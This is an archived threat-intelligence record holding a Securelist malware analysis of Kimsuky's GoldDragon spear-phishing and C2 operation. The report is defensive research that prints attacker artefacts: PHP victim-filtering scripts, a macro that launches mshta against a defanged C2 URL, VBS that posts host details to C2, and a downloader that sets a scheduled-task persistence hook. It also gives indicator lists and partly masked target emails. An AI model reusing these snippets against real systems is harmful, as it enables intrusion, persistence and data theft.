{ "id": "b9c032b3-e010-4fdd-a5c8-4718b09550bc", "created_at": "2026-04-06T00:10:58.992814Z", "updated_at": "2026-04-10T03:37:41.021225Z", "deleted_at": null, "sha1_hash": "263cf9bd0bc4d8e05d22905bbe47df79eebca485", "title": "Kimsuky’s GoldDragon cluster and its C2 operations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1554022, "plain_text": "Kimsuky’s GoldDragon cluster and its C2 operations\r\nBy Seongsu Park\r\nPublished: 2022-08-25 · Archived: 2026-04-05 15:39:15 UTC\r\nKimsuky (also known as Thallium, Black Banshee and Velvet Chollima) is a prolific and active threat actor\r\nprimarily targeting Korea-related entities. Like other sophisticated adversaries, this group also updates its tools\r\nvery quickly. In early 2022, we observed this group was attacking the media and a think-tank in South Korea and\r\nreported technical details to our threat intelligence customer.\r\nKimsuky’s GoldDragon cluster infection procedure\r\nIn its new attack, the actor initiated the infection chain sending a spear-phishing email containing a macro-embedded Word document. Various examples of different Word documents were uncovered, each showing\r\ndifferent decoy contents related to geopolitical issues on the Korean Peninsula.\r\nContents of decoy\r\nThe actor took advantage of the HTML Application file format to infect the victim and occasionally used the\r\nHangeul decoy document. After the initial infection, a Visual Basic Script was delivered to the victim. In this\r\nprocess, the actor abused a legitimate blog service to host a malicious script with an encoded format. The\r\nimplanted VBS file is capable of reporting information about infected machines and downloading additional\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 1 of 13\n\npayloads with an encoded format. The final stage is a Windows executable-type malware that is capable of\r\nstealing information from the victim such as file lists, user keystrokes, and stored web browser login credentials.\r\nWhile researching Kimsuky’s novel infection chain, grouped as a GoldDragon cluster, we are faced with several\r\nlimitations:\r\nIt’s not easy to acquire the next stage payloads during analysis of a multi-stage infection.\r\nEven if we connect to the C2 server to acquire the payload, it’s hard to get a relevant response.\r\nIt’s not easy to figure out the connection between each object.\r\nWhile tracking the Kimsuky group’s endless operations, however, we discovered server-side scripts related to the\r\nabove infection chain. Based on this finding and further enriching it with data from our telemetry, we were able to\r\nreconstruct the whole operation methodology of this group. The Kimsuky group configured multi-stage command\r\nand control servers with various commercial hosting services located around the world. We can summarize the\r\nwhole C2 operation as follows:\r\n1. 1 The actor sends a spear-phishing email to the potential victim to download additional documents.\r\n2. 2 If the victim clicks the link, it results in a connection to the first stage C2 server, with an email address as\r\nparameter.\r\n3. 3 The first stage C2 server verifies the incoming email address parameter is an expected one and delivers\r\nthe malicious document if it’s in the target list. The first stage script also forwards the victim’s IP address to\r\nthe next stage server.\r\n4. 4 When the fetched document is opened, it connects to the second C2 server.\r\n5. 5 The corresponding script on the second C2 server checks the IP address forwarded from the first stage\r\nserver to check it’s an expected request from the same victim. Using this IP validation scheme, the actor\r\nverifies whether the incoming request is from the victim or not.\r\n6. 6 On top of that, the operator relies on several other processes to carefully deliver the next payload such as\r\nchecking OS type and predefined user-agent strings.\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 2 of 13\n\nC2 server structure\r\nC2 script (download.php) for malicious document delivery\r\nAs a result of analyzing the server-side script to convey a malicious document, we figured out how this actor\r\nverifies the request from the client and minimizes exposure of their payload. This script works with a specific\r\nparameter name from the victim, so we suspect the actor delivers a download link to the victim via email or by\r\nsending a request using another type of payload.\r\n1. 1 It checks the who GET parameter from the victim. The who parameter contains an email address without\r\na domain name.\r\nif (isset($_GET['who']) \u0026\u0026 $_GET['who'] == \"[redacted]\") # Check 'who' parameter value\r\n        {\r\n            $vbs_server = \"weworld59.myartsonline.com\"; # The next stage server\r\n            $virus = \"v.doc\";                       # Malicious document\r\n            $unvirus = \"un.doc\";                     # Benign document\r\n            $downname = \"CV.DHOM Alexandra Siddall (Korean).doc\"; # Delivered file name\r\n            $who = $_GET['who'];\r\n            $down = $who . \".txt\";\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 3 of 13\n\n2. 2 If the incoming request contains an expected email address, it saves the date, IP address and user-agent to\r\nthe [who]_downhistory.txt file.\r\n3. 3 If the user-agent contains Windows, which means the victim is a Windows machine, it goes to the next\r\nstep. Otherwise, it delivers a benign document to the victim.\r\n4. 4 Next, the script checks whether the connection from the victim is the first request or not by checking the\r\nexistence of the [who].txt file.\r\n5. 5 If the [who].txt file does not exist, it means it’s the first request from the victim, so the script forwards the\r\nIP address to the other server (VBS server), delivering the malicious document, saving the victim’s\r\ninformation to the [who].txt including date, IP address and user-agent.\r\nNote that the script sends the victim’s IP address to the other server (named “VBS server” by the author). If the\r\nvictim connects with an appropriate email address and if it’s an initial connection, the C2 script forwards the IP\r\naddress to the specific servers with /index.php?ip= GET request. Sending the appropriate victim IP addresses to\r\nthe remote server is a very important process for the operational security of this actor. We’ll look in more detail at\r\nhow the operator uses this information in the next section.\r\nfunction send_ip($host , $data)\r\n{\r\n$fp = @fsockopen(\"tcp://\".$host, 80, $errno, $errstr, 30);\r\nif (!$fp) {\r\n} else {\r\n     $out = \"GET /index.php?ip=\".$data.\" HTTP/1.1\\r\\n\";\r\n     $out .= \"Host: \".$host.\"\\r\\n\";\r\n     $out .= \"Connection: Close\\r\\n\\r\\n\";\r\n     fwrite($fp, $out);\r\n     fclose($fp);\r\n}\r\n}\r\nLooking at the corresponding script (index.php) of the above IP-delivering GET request, here’s how it works.\r\nOnce this script receives an IP address in the ip parameter of the HTTP request, it extracts the victim’s IP address\r\nfrom ip parameter and saves it to the allow.txt file. Otherwise, it saves the client information to the error.txt file\r\nand redirects the client to mail.google.com in this case. Additionally, the author used various legitimate websites\r\nfor redirection, such as naver.com, kisa.or.kr, or other popular email services. The allow.txt file, which contains the\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 4 of 13\n\nappropriate victim’s IP address, is referred by another C2 script to verify whether the incoming request is valid\r\nand thus whether or not to deliver the next stage payload.\r\nif(isset($_GET['ip'])){\r\n     $szfilename = \"allow.txt\";\r\n     $pfile = fopen($szfilename,\"ab\");\r\n     $res= $_GET['ip'] . \"\\r\\n\" ;\r\n     fwrite($pfile,$res);\r\n     fclose($pfile);  \r\n     exit;\r\n}\r\n$szfilename = \"error.txt\";\r\n$pfile = fopen($szfilename,\"ab\");\r\n$res= $date . \"-\" . \"\\r\\n\".$ip . \"\\r\\n\" . $_SERVER['HTTP_USER_AGENT'].\"\\r\\n\";\r\nfwrite($pfile,$res);\r\nfclose($pfile);  \r\nheader('Location: https://mail.google.com');\r\nAlso, we discovered that both malicious and benign documents are being delivered by this script. The operator\r\nmaintains a pair of documents, one benign (un.doc) and the other malicious (v.doc), and delivers the appropriate\r\none depending on the result of the victim verification step. The contents of decoy documents have various topics\r\nincluding the agenda of the “2022 Asian Leadership Conference”, a form of honorarium request and an Australian\r\ndiplomat’s curriculum vitae. As we can see, the actor uses content the victim could be interested in, such as an\r\nevent to be held in the near future, a specific request form, and the resume of a high-profile individual.\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 5 of 13\n\nDecoy documents\r\nMalicious document and method of delivering next stage payload\r\nMalicious documents delivered to the victim contain a macro to fetch the next stage payload. The macro has a\r\nsimple functionality and, interestingly, it spawns several child Windows command shells, probably intended for\r\nevading behavior-based analysis. Eventually, the macro executes a fetched payload with the mshta.exe process that\r\nis designed to execute a Microsoft HTML Application. The following scriptlet is part of a malicious macro in the\r\ndocument. It contains a remote server address to fetch the next stage payload.\r\ncmd = \"c\" + \"md /\" + \"c c\" + \"md /\" + \"c cm\" + \"d /\" + \"c c\" + \"m\" + \"d /\" + \"c c\" + \"md /\" + \"c c\" + \"md\r\n/\" + \"c msht\" + \"a.e\" + \"xe hxxp://leehr24.mywebcommunity[.]org/h.php\"\r\nShell cmd, 0\r\nSleep 9000\r\ncmd = \"cm\" + \"d /\" + \"c TAS\" + \"KKI\" + \"LL /\" + \"F /\" + \"IM msh\" + \"ta.e\" + \"xe\"\r\nShell cmd, 0\r\nLuckily, we discovered the corresponding C2 script (h.php) from our telemetry. This script saves incoming traffic\r\ninformation to the log.txt file including the date, IP address, user-agent and the right-most 20 characters of the IP\r\nMD5 hash which is internally called “TID” (probably short for “Target ID”). Next, it checks the presence of the\r\nallow.txt file that contains IP addresses of verified victims. Only if the client’s IP address exists in the allow.txt, is\r\nthe next stage payload, h.txt, delivered. Otherwise, the script delivers a short Visual Basic Script for terminating\r\nthe mshta.exe process.\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 6 of 13\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n$downfile = \"h.txt\";\r\n$logfile = \"log.txt\";\r\n$allow_file = \"allow.txt\";\r\n$handle = fopen($logfile, \"ab\");\r\nfwrite($handle, $date .\"\\r\\n\" . $ip . \"\\r\\n\" . $_SERVER['HTTP_USER_AGENT'].\"\\r\\n\".\"id=\".$TID.\"-----\r\n----\\r\\n\");\r\nfclose($handle);\r\nif(file_exists($allow_file)){\r\n    $fp = fopen($allow_file,\"r\");\r\n    $content = fread($fp, filesize($allow_file));\r\n    fclose($fp);\r\n    if(!stristr($content,$ip )){\r\n   echo 'Set objShell = CreateObject(\"Wscript.shell\")\r\n     objShell.run \"TASKKILL /F /IM mshta.exe\" , 0 , False';\r\n   exit;\r\n    }\r\n}\r\nVBS scripts from VBS Server\r\nAllowing the macro in the malicious Word document to run leads the victim to fetch and execute an HTML\r\nApplication (.HTA) payload. The fetched HTA file has two main goals: reporting the victim information to the C2\r\nserver and creating a scheduled task for auto-execution. The Kimsuky group tends to heavily reuse their code in\r\nvarious scripts; for instance, Visual Basic applications in macros, Visual Basic scripts and HTML applications.\r\nThe sent data contains the ProgramFiles folder path, antivirus name, recently opened file list, user name, OS\r\nname, OS version, Microsoft office version, .NET framework version, the file list from the Desktop folder, and a\r\nlist of user-pinned taskbar items. When the script delivers the collected information to the C2 server, it uses\r\n/info.php?ki87ujhy= format, the Kimsuky group’s usual URL format for fingerprinting. Notably, it uses a hard-https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 7 of 13\n\ncoded user-agent, including the intentionally misspelled word Chnome. After looking at the server-side script, we\r\nunderstand why they use Chnome and not Chrome.\r\nProgramFilesFolder = objShell.ExpandEnvironmentStrings(\"%ProgramFiles%\")\r\nProgramFilesx86Folder = objShell.ExpandEnvironmentStrings(\"%ProgramFiles(x86)%\")\r\ndrl = server_url + \"/info.php?ki87ujhy=\" + ProgramFilesx86Folder + \"\u0026rdxvdw=\" + ProgramFilesFolder\r\n..[redacted]..\r\nPost = \"v=\" + AntiVirusName + \"\u0026r=\" + recentlist + \"\u0026un=\" + UserName + \"\u0026os=\" + os + \"\u0026sv=\" +\r\nVersion + \"\u0026msv=\" + GetOfficeVersionNumber + \"\u0026dnv=\" + dnv + \"\u0026dll=\" + desktop_lnk + \"\u0026tll=\" +\r\ntaskbar_lnk\r\nDim WinHttpReq\r\nSet WinHttpReq = CreateObject(\"MSXML2.ServerXMLHTTP.6.0\")\r\nWinHttpReq.Open \"POST\", drl, False\r\nWinHttpReq.setRequestHeader \"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chnome/97.0.4692.99 Safari/537.36\"\r\nWinHttpReq.setRequestHeader \"Content-Type\", \"application/x-www-form-urlencoded\"\r\nWinHttpReq.setRequestHeader \"Content-Length\", Len(Post)\r\nWinHttpReq.Send Post\r\nApart from the reporting capability, the fetched script downloads an additional payload and registers it with a\r\npersistence mechanism. This code is also heavily used in other Kimsuky scripts and fetches the payload through\r\ns.php, saving it to the defs.ini file, registering the file as a Windows schedule, with the name “OneDrive Clean” in\r\nthis case.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\nSet shell_obj = CreateObject(\"WScript.Shell\")\r\nini_file = shell_obj.expandenvironmentstrings(\"%appdata%\") \u0026 \"\\defs.ini\"\r\ndrl = server_url + \"/s.php\"\r\nSet WinHttpReq= CreateObject(\"MSXML2.ServerXMLHTTP.6.0\")\r\nWinHttpReq.Open \"GET\", drl,False\r\nWinHttpReq.setRequestHeader \"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\nAppleWebKit/537.36 (KHTML, like Gecko) Chnome/97.0.4692.99 Safari/537.36\"\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 8 of 13\n\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\nWinHttpReq.send\r\nIf WinHttpReq.Status=200 Then\r\nSet oFile = CreateObject(\"Scripting.FileSystemObject\")\r\nSet ofp = oFile.CreateTextFile(ini_file, 2)\r\nofp.Write kjhskfjaskdjf(res)\r\nofp.Close\r\nEnd If\r\ncmd1 = \"w\" + \"sc\" + \"ript.e\" + \"xe //\" + \"e:v\" + \"bsc\" + \"ript //b \"\"\"\"\" + ini_file + \"\"\"\"\"\"\r\ncmd2 = \"scht\" + \"asks /cr\" + \"eate /s\" + \"c mi\" + \"nute /mo 30 /tn \"\"OneDrive Clean\"\" /tr \"\"\" + cmd1 +\r\n\"\"\"\"\r\nshell_obj.run cmd2 ,0,False\r\nDuring our research, we discovered a corresponding C2 script (s.php) for delivering a payload for auto-execution.\r\nThe primary objectives of the delivered VBS payload are connecting to the legitimate blog, parsing the post and\r\nfinally acquiring the next stage payload. Interestingly, this C2 script generates a blog address based on the victim’s\r\nIP address. After calculating the MD5 hash of the victim’s IP address, it cuts off the last 20 characters, and turns it\r\ninto a blog address. The author’s intent here is to operate a dedicated fake blog for each victim, thereby decreasing\r\nexposure of their malware and infrastructure. Additionally, the script checks whether the user-agent has an\r\nuncommon string, chnome. As we mentioned earlier, the Visual Basic Script connects to this C2 script using a\r\nhard-coded chnome User-agent name and the script checks the misspelled user-agent to verify it’s an expected\r\nrequest from a real victim.\r\n$filename = hash(\"md5\" , $ip);\r\n$filename = str_replace(\"+\" , \"\" , $filename);\r\n$filename = str_replace(\"=\" , \"\" , $filename);\r\n$filename = str_replace(\"/\" , \"\" , $filename);\r\n$filename = right($filename , 20);\r\n$logfile = $filename.\".txt\";\r\n$errorfile = \"error.txt\";\r\nif(stristr($_SERVER['HTTP_USER_AGENT'] , \"chnome\"))\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 9 of 13\n\n{\r\n   $url = base64_encode(\"https://\" . $filename . \".blogspot.com/2022/04/1.html\");\r\n   $spy_script = 'Function hhgtttgffgg(ByVal base64String)\r\n   On Error Resume Next\r\n   Const Base64 =\r\n\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n   Dim dataLength, sOut, groupBegin\r\nBased on our findings and analysis above, we list the tricks the actor adopts to hide their infrastructure and make it\r\nharder for security researchers and auto-analysis systems to acquire payloads:\r\nTricks from C2 scripts\r\nVictims\r\nBased on the contents of the decoy document, we hypothesize that the targets of this operation are people or\r\nentities related to politics or diplomatic activities. Also, historically, politicians, diplomats, journalists, professors,\r\nand North Korean defectors have been prime targets of the Kimsuky group. Based on the email address names\r\nfrom the C2 scripts, we can further consolidate this hypothesis. The C2 scripts have only partial email addresses,\r\nso we tried to extrapolate the full email address and real owner from within the diplomatic and academic spheres.\r\nEmail name Suspected email Delivered file name Email owner\r\nyk**** yk****@***.ac.kr unknown\r\nSouth Korean university\r\nprofessor\r\nlee**** lee****@gmail.com CV.DHOM Alexandra\r\nSiddall (Korean).doc\r\nDirector General of South\r\nKorean government\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 10 of 13\n\norganization\r\nchon**** chon****@naver.com\r\nCV.DHOM Alexandra\r\nSiddall (Korean).doc\r\nResearcher at Defense\r\nAnalyses\r\nwoo****** Unknown\r\nCV.DHOM Alexandra\r\nSiddall (Korean).doc\r\nThink-tank researcher\r\nscc***** scc*****@naver.com\r\nCV.DHOM Alexandra\r\nSiddall (Korean).doc\r\nResearcher of think-tank\r\nwon*** won***@****.ac.kr\r\nCV.DHOM Alexandra\r\nSiddall (Korean).doc\r\nSouth Korean university\r\nprofessor\r\nthk***** thk*****@naver.com\r\nCV.DHOM Alexandra\r\nSiddall (Korean).doc\r\nSouth Korean university\r\nprofessor\r\nkim***** kim*****@gmail.com\r\nCV.DHOM Alexandra\r\nSiddall (Korean).doc\r\nSouth Korean university\r\nprofessor\r\nkim*** Unknown\r\n2022년AL(220412).doc\r\nAsian Leadership\r\nConference\r\nProbably former Korean\r\nAmbassador to the United\r\nNations\r\njh****** jh******@****.ac.kr\r\n[양식]사례비지급의뢰\r\n서.doc\r\n([Template]Pay\r\nhonorarium.doc)\r\nProfessor of South Korea\r\nuniversity\r\njung****** jung******@gmail.com\r\n[양식]사례비지급의뢰\r\n서.doc\r\nRepresentative of Research\r\nCouncil for North Korea\r\nsung********* sung*********@gmail.com\r\n[양식]사례비지급의뢰\r\n서.doc\r\nAssistant professor at South\r\nKorean university\r\nConclusions\r\nKimsuky, one of the most prolific and active threat actors on the Korean Peninsula, operates several clusters and\r\nGoldDragon is one of the most frequently used. We’ve seen that the Kimsuky group continuously evolves its\r\nmalware infection schemes and adopts novel techniques to hinder analysis. The main difficulty in tracking this\r\ngroup is that it’s tough to acquire a full-infection chain. As we can see from this research, threat actors have\r\nrecently adopted victim verification methodology in their command and control servers. Despite the difficulty of\r\nobtaining server-side objects, if we analyze an attacker’s server and malware from the victim’s side, we can get a\r\nfull understanding of how the threat actors operate their infrastructure and what kind of techniques they employ.\r\nIndicators of Compromise\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 11 of 13\n\nMalicious documents\r\nCHM file\r\nVisual Basic Scripts\r\nHTML Applications\r\nWindows executable payload\r\nServer scripts\r\nDomains and IPs\r\nMalicious document hosting servers:\r\nattach.42web[.]io\r\nattachment.a0001[.]net\r\nbigfile[.]totalh[.]net\r\nclouds[.]rf[.]gd\r\nglobal[.]onedriver[.]epizy[.]com\r\nglobal.web1337[.]net\r\nC2 servers:\r\nhxxp://leehr36[.]mypressonline[.]com/h[.]php\r\nhxxp://leehr24[.]mywebcommunity[.]org/h[.]php\r\nhxxp://weworld59[.]myartsonline[.]com/h[.]php\r\nhxxp://weworld78[.]atwebpages[.]com/info[.]php?ki87ujhy=\r\nhxxp://weworld78[.]atwebpages[.]com/s[.]php\r\nhxxp://weworld78[.]atwebpages[.]com/hta[.]php\r\nhxxp://weworld79[.]mygamesonline[.]org/hta[.]php\r\nhxxp://glib-warnings[.]000webhostapp[.]com/info[.]php?ki87ujhy=\r\nhxxp://glib-warnings[.]000webhostapp[.]com/s[.]php\r\nhxxp://glib-warnings[.]000webhostapp[.]com/hta[.]php\r\nhxxp://0knw2300[.]mypressonline[.]com/d[.]php\r\nhxxp://21nari[.]getenjoyment[.]net/info[.]php?ki87ujhy=\r\nhxxp://21nari[.]mypressonline[.]com/s[.]php\r\nhxxp://21nari[.]scienceontheweb[.]net/r[.]php\r\nhxxp://chmguide[.]atwebpages[.]com/?key=cWFLQ2hCU3ZTaUNha3hVaGdZSXRyQT09\r\nhxxp://chunyg21[.]sportsontheweb[.]net/info[.]php?ki87ujhy=\r\nhxxp://chunyg21[.]sportsontheweb[.]net/s[.]php\r\nhxxp://faust22[.]mypressonline[.]com/1[.]txt\r\nhxxp://faust22[.]mypressonline[.]com/info[.]php\r\nhxxp://hochdlincheon[.]mypressonline[.]com/f[.]txt\r\nhxxp://hochuliasdfasfdncheon[.]mypressonline[.]com/report[.]php?filename=\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 12 of 13\n\nhxxp://hochulidncheon[.]mypressonline[.]com/c[.]txt\r\nhxxp://hochulidncheon[.]mypressonline[.]com/k[.]txt\r\nhxxp://hochulincddheon[.]mypressonline[.]com/post[.]php\r\nhxxp://hochulincheon[.]mypressonline[.]com/c[.]txt\r\nhxxp://hochulincheon[.]mypressonline[.]com/down[.]php\r\nhxxp://hochulincheon[.]mypressonline[.]com/f[.]txt\r\nhxxp://hochulincheon[.]mypressonline[.]com/k[.]txt\r\nhxxp://hochulincheon[.]mypressonline[.]com/post[.]php\r\nhxxp://hochulincheon[.]mypressonline[.]com/report[.]php?filename=\r\nhxxp://hochulincheon[.]mypressonline[.]com/w[.]txt\r\nhxxp://hochulincheon[.]mypressonline[.]com/h[.]php\r\nhxxp://hochulindcheon[.]mypressonline[.]com/w[.]txt\r\nhxxp://hochulindddcheon[.]mypressonline[.]com/post[.]php\r\nhxxp://hochulinsfdgasdfcheon[.]mypressonline[.]com/post[.]php\r\nhxxp://koreajjjjj[.]atwebpages[.]com/1[.]hta\r\nhxxp://koreajjjjj[.]sportsontheweb[.]net/k[.]php\r\nhxxp://kpsa20201[.]getenjoyment[.]net/d[.]php\r\nhxxp://o61666ch[.]getenjoyment[.]net/post[.]php\r\nhxxp://o61666ch[.]getenjoyment[.]net/report[.]php?filename=\r\nhxxp://yulsohnyonsei[.]atwebpages[.]com/1[.]hwp\r\nhxxp://yulsohnyonsei[.]atwewbpages[.]com/d[.]php\r\nhxxp://yulsohnyonsei[.]medianewsonline[.]com/1[.]hwp\r\nhxxp://yulsohnyonsei[.]medianewsonline[.]com/1[.]txt\r\nhxxp://yulsohnyonsei[.]medianewsonline[.]com/info[.]php?ki87ujhy=\r\nhxxp://yulsohnyonsei[.]medianewsonline[.]com/ksskdh/d[.]php\r\nhxxp://yulsohnyonsei[.]medianewsonline[.]com/post[.]php\r\nhxxp://yulsohnyonsei[.]medianewsonline[.]com/report[.]php?filename=\r\nhxxp://dmengineer[.]co[.]kr/images/s_title16[.]gif  Legitimate/compromised\r\nhxxp://dmengineer[.]co[.]kr/images/s_title17[.]gif  Legitimate/compromised\r\nhxxp://dmengineer[.]co[.]kr/images/s_title18[.]gif  Legitimate/compromised\r\nBlog URL\r\nhxxps://225b4d3c305f43e1a590[.]blogspot[.]com/2022/01/1[.]html\r\nhxxps://225b4d3c305f43e1a590[.]blogspot[.]com/2022/02/1[.]html\r\nhxxps://3a8f846675194d779198[.]blogspot[.]com/2021/10/1[.]html\r\nhxxps://c52ac2f8ac0693d8790c[.]blogspot[.]com/2021/10/1[.]html\r\nhxxps://leejong-sejong[.]blogspot[.]com/2022/01/blog-post[.]html\r\nSource: https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nhttps://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/" ], "report_names": [ "107258" ], "threat_actors": [ { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434258, "ts_updated_at": 1775792261, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/263cf9bd0bc4d8e05d22905bbe47df79eebca485.pdf", "text": "https://archive.orkl.eu/263cf9bd0bc4d8e05d22905bbe47df79eebca485.txt", "img": "https://archive.orkl.eu/263cf9bd0bc4d8e05d22905bbe47df79eebca485.jpg" } }